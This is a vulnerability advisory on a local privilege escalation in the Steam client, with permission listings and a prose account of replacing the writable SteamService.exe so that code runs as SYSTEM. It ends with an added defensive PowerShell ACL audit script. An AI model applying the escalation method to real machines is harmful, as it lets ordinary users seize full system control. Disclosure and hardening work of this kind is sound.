=======================================================================================================
=======================================================================================================
Valve Steam Client Application v1559/1559 Local Privilege Escalation (reloaded)
url: http://www.steampowered.com
Inspiration: http://www.exploit-db.com/exploits/17459/
Author: shinnai
mail: shinnai[at]autistici[dot]org
site: http://www.shinnai.altervista.org/
This was written for educational purpose. Use it at your own risk.
Author will be not responsible for any damage.
Tested on:
Windows XP Professional SP 3
=======================================================================================================
=======================================================================================================
Because the whole "Steam" folder is vulnerable (it is writable by every member of BUILTIN\Users):
C:\>cacls "C:\Program Files\Steam"
C:\Program Files\Steam BUILTIN\Users:F <----------- VULNERABLE
BUILTIN\Users:(OI)(CI)(IO)F
NT AUTHORITY\SYSTEM:F
NT AUTHORITY\SYSTEM:(OI)(CI)(IO)F
BUILTIN\Users:R
BUILTIN\Users:(OI)(CI)(IO)(accesso speciale:)
GENERIC_READ
GENERIC_EXECUTE
BUILTIN\Power Users:C
BUILTIN\Power Users:(OI)(CI)(IO)C
BUILTIN\Administrators:F
BUILTIN\Administrators:(OI)(CI)(IO)F
NT AUTHORITY\SYSTEM:F
NT AUTHORITY\SYSTEM:(OI)(CI)(IO)F
CREATOR OWNER:(OI)(CI)(IO)F
it is interesting to see that this package installs a new service called "Steam Client Service", so:
C:\>cacls "C:\Program Files\Steam\bin\SteamService.exe"
C:\Program Files\Steam\bin\SteamService.exe BUILTIN\Users:F <----------- VULNERABLE
NT AUTHORITY\SYSTEM:F
BUILTIN\Power Users:C
BUILTIN\Administrators:F
Unfortunately, this service is set to start manually:
C:\>sc queryex "Steam Client Service"
SERVICE_NAME: Steam Client Service
TYPE : 10 WIN32_OWN_PROCESS
STATE : 1 STOPPED
(NOT_STOPPABLE,NOT_PAUSABLE,IGNORES_SHUTDOWN)
WIN32_EXIT_CODE : 1077 (0x435)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x0
PID : 0
FLAGS :
It doesn't matter: the next time someone starts the service, our executable will run with SYSTEM privileges :-)
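The condition described above (a service binary, or the directory holding it, writable by BUILTIN\Users) is easy to audit across all installed services. The following PowerShell script is an added example, not part of the advisory; it assumes an elevated prompt and uses only Get-CimInstance, Get-Acl and the standard FileSystemRights flags, and reports every service whose binary or parent directory grants write-type rights to a low-privileged principal.

```powershell
# Added example (not from the advisory): flag services whose binary or its
# parent directory can be modified by low-privileged principals, i.e. the
# BUILTIN\Users:F condition shown for SteamService.exe. Run elevated.

$LowPrivPrincipals = @('BUILTIN\Users', 'Everyone',
                       'NT AUTHORITY\Authenticated Users', 'NT AUTHORITY\INTERACTIVE')

# Any of these rights lets a standard user replace or alter the file.
$WriteRights = [System.Security.AccessControl.FileSystemRights]::Write -bor
               [System.Security.AccessControl.FileSystemRights]::Modify -bor
               [System.Security.AccessControl.FileSystemRights]::FullControl -bor
               [System.Security.AccessControl.FileSystemRights]::Delete

function Get-ServiceBinaryPath {
    param([string]$PathName)
    # PathName may be quoted or unquoted and may carry arguments; keep the .exe only.
    if ($PathName -match '^"([^"]+)"') { return $Matches[1] }
    if ($PathName -match '^(.+?\.exe)') { return $Matches[1] }
    return $PathName
}

function Test-WeakAcl {
    param([string]$Path, [string]$Service)
    if (-not (Test-Path -LiteralPath $Path)) { return }
    foreach ($ace in (Get-Acl -LiteralPath $Path).Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        if ($LowPrivPrincipals -notcontains $ace.IdentityReference.Value) { continue }
        if (($ace.FileSystemRights -band $WriteRights) -ne 0) {
            [PSCustomObject]@{
                Service   = $Service
                Path      = $Path
                Principal = $ace.IdentityReference.Value
                Rights    = $ace.FileSystemRights
            }
        }
    }
}

Get-CimInstance Win32_Service | ForEach-Object {
    $exe = Get-ServiceBinaryPath $_.PathName
    if (-not $exe) { return }   # some services (e.g. drivers) report no path
    # A writable directory allows renaming/replacing the file even when the
    # file's own ACL is tight, so check both.
    foreach ($p in @($exe, (Split-Path -Parent $exe))) {
        Test-WeakAcl -Path $p -Service $_.Name
    }
} | Format-Table -AutoSize
```

On the affected system this lists "Steam Client Service" with Principal BUILTIN\Users and Rights FullControl for both the binary and the Steam folder; the fix is to restrict the ACL so only Administrators and SYSTEM can write there.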
Be safe